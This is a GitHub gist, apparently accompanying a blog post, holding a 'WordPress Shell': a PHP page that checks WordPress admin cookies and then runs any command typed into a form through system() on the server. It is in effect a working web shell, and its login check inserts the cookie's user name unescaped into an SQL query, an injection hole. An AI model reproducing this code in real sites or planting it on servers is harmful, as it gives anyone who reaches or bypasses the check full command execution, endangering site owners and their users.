Created
February 10, 2014 07:18
-
-
Save AbhishekGhosh/8911697 to your computer and use it in GitHub Desktop.
WordPress Shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/* Don't remove this line. */ | |
require('wp-config.php'); | |
/* Checking login & pass in the database */ | |
function veriflog() { | |
global $cookiehash; | |
global $tableusers, $wpdb; | |
if (!empty($_COOKIE['wordpressuser_' . $cookiehash])) { | |
$user_login = $_COOKIE['wordpressuser_' . $cookiehash]; | |
$user_pass_md5 = $_COOKIE['wordpresspass_' . $cookiehash]; | |
} else { | |
return false; | |
} | |
if ('' == $user_login) | |
return false; | |
if (!$user_pass_md5) | |
return false; | |
$login = $wpdb->get_row("SELECT user_login, user_pass FROM $tableusers WHERE user_login = '$user_login'"); | |
if (!$login) { | |
return false; | |
} else { | |
if ($login->user_login == $user_login && md5($login->user_pass) == $user_pass_md5) { | |
return true; | |
} else { | |
return false; | |
} | |
} | |
} | |
if ( !veriflog() ) { | |
header('Expires: Wed, 11 Jan 1984 05:00:00 GMT'); | |
header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT'); | |
header('Cache-Control: no-cache, must-revalidate'); | |
header('Pragma: no-cache'); | |
if (!empty($_COOKIE['wordpressuser_' . $cookiehash])) { | |
$error= __("<strong>Error</strong>: wrong login or password."); | |
} | |
$redir = 'Location: ' . get_settings('siteurl') . '/wp-login.php?redirect_to=' . urlencode($_SERVER['REQUEST_URI']); | |
header($redir); | |
exit(); | |
} | |
get_currentuserinfo(); | |
if ($user_level < 10) { | |
die('Sorry, not allowed to Execute Commands'); | |
} | |
?> | |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> | |
<html xmlns="http://www.w3.org/1999/xhtml"> | |
<head profile="http://gmpg.org/xfn/1"> | |
<title><?php bloginfo('name'); ?><?php wp_title(); ?></title> | |
<meta http-equiv="Content-Type" content="text/html; charset=<?php bloginfo('charset'); ?>" /> | |
<meta name="generator" content="WordPress <?php bloginfo('version'); ?>" /> <!-- leave this for stats --> | |
<style type="text/css" media="screen"> | |
@import url( <?php echo get_settings('siteurl'); ?>/wp-layout.css ); | |
</style> | |
<link rel="stylesheet" type="text/css" media="print" href="<?php echo get_settings('siteurl'); ?>/print.css" /> | |
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="<?php bloginfo('rss2_url'); ?>" /> | |
<link rel="alternate" type="text/xml" title="RSS .92" href="<?php bloginfo('rss_url'); ?>" /> | |
<link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="<?php bloginfo('atom_url'); ?>" /> | |
<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" /> | |
<?php wp_get_archives('type=monthly&format=link'); ?> | |
<?php //comments_popup_script(); // off by default ?> | |
<?php wp_head(); ?> | |
</head> | |
<body> | |
<div id="rap"> | |
<h1 id="header"><a href="<?php bloginfo('url'); ?>"><?php bloginfo('name'); ?></a></h1> | |
<div id="content"> | |
<?php | |
if ($_POST['nextPhase'] == '1') { ?> | |
<div class="post"> | |
<pre> | |
<?php $command_Desc = $_POST['commandDesc']; $last_line = system($command_Desc, $retval); | |
echo nl2br($retval); ?> | |
</pre> | |
</div><hr/> | |
<?php | |
} | |
?> | |
<div class="post"> | |
Type in the command you would like to perform:<p> | |
<form method="POST" name="commandInfo" ACTION="output.php"> | |
<input type="text" name="commandDesc"> | |
<input type="submit" name="Button" value="Execute"> | |
<input type="hidden" name="nextPhase" value="1"> | |
</form> | |
</td> | |
</div> | |
</div> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This is gist is created by Abhishek Ghosh for the blog article Run shell commands with PHP.